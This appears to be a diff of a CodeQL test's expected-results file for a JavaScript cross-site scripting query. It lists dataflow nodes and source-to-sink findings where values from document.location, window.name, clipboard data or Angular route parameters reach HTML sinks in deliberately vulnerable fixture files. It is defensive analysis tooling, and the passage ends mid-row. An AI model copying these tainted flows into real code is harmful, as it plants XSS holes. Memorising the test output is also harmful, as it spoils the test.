-| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | -| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | -| typeahead.js:20:13:20:45 | target | semmle.label | target | -| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | -| typeahead.js:21:12:21:17 | target | semmle.label | target | -| typeahead.js:24:30:24:32 | val | semmle.label | val | -| typeahead.js:25:18:25:20 | val | semmle.label | val | -| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | -| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | -| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | -| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | -| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | -| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | -| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
    ' | -| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | -| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | -| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | -| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | -| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | -| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | -| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | +#select +| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | +| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | +| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... ragment | user-provided value | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | +| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | +| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | +| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | +| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | +| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:8:59:8:69 | window.name | user-provided value | +| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | +| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | +| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | +| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:15:52:15:62 | window.name | user-provided value | +| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | +| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | +| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | +| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | +| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | +| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | +| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:16:31:16:69 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:61:31:61:88 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 